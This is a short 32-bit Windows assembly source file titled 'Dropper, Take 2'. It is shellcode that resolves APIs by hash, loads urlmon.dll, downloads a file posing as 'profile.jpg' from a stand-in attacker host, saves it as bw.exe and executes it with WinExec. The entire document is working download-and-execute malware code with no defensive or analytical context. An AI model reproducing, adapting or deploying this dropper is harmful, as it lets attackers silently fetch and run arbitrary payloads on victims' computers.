Dropper, Take 2, Assembly Code

drop2.asm

[BITS 32]
[ORG 0]

  cld
  mov  esi, esp	  ; ESI points to the current postion of the stack (for ref local var)
  sub  esp, 2000h  ; Alloc some stack space
  call start
delta:
%include "block_api32.asm"
start:
  pop	ebp
  lea	eax, [ebp+szUrlmon-delta]
  push	eax
  push	0x0726774C      ; hash( "kernel32.dll", "LoadLibraryA" )
  call	ebp             ; LoadLibraryA("urlmon.dll");
  mov	dword [esi], eax ; [esi-0] => hModuleUrlmon
	
  lea	ecx, [ebp+szDownloadToFile-delta]
  push	ecx
  mov	edx, [esi]	; hModuleUrlmon
  push	edx
  push	0x7802F749	; hash( "kernel32.dll", "GetProcAddress" )
  call	ebp		; GetProcAddress(hModuleUrlmon, szDownloadToFile);
  mov	dword [esi-4], eax ; [esi-4] => URLDownloadToFileA
	
  xor	ecx, ecx
  push	ecx		; lpfnCB
  mov	ebx, 10h
  push	ebx		; dwReserved = BINDF_GETNEWESTVERSION
  lea	edx, [ebp+szFilename-delta] ; szFilename
  push	edx
  lea	edx, [ebp+szDownloadURL-delta] ; szDownloadURL
  push	edx
  push	ecx		; pCaller
  call 	dword [esi-4]	; URLDownloadToFileA ( LPUNKNOWN pCaller, LPCTSTR szDownloadURL, 
					     ; LPCTSTR szFileName, DWORD dwReserved,
  					     ; LPBINDSTATUSCALLBACK lpfnCB );
	
  mov	ecx, 1	        ; ecx = 1
  push 	ecx		; uCmdShow = SW_SHOWNORMAL
  lea	edx, [ebp+szFilename-delta] ; lpCmdLine
  push	edx
  push	0x876F8B31	; hash( "kernel32.dll", "WinExec" )
  call	ebp		; WinExec( LPCSTR lpCmdLine, UINT uCmdShow);
	
  push	0x56A2B5F0	; hash( "kernel32.dll", "ExitProcess" )
  call	ebp
szUrlmon:
  db "urlmon.dll", 0
szDownloadToFile:
  db "URLDownloadToFileA", 0
szFilename:
  db "bw.exe", 0
szDownloadURL:
  db "http://evil.attacker.com/profile.jpg", 0
  times 64 db 0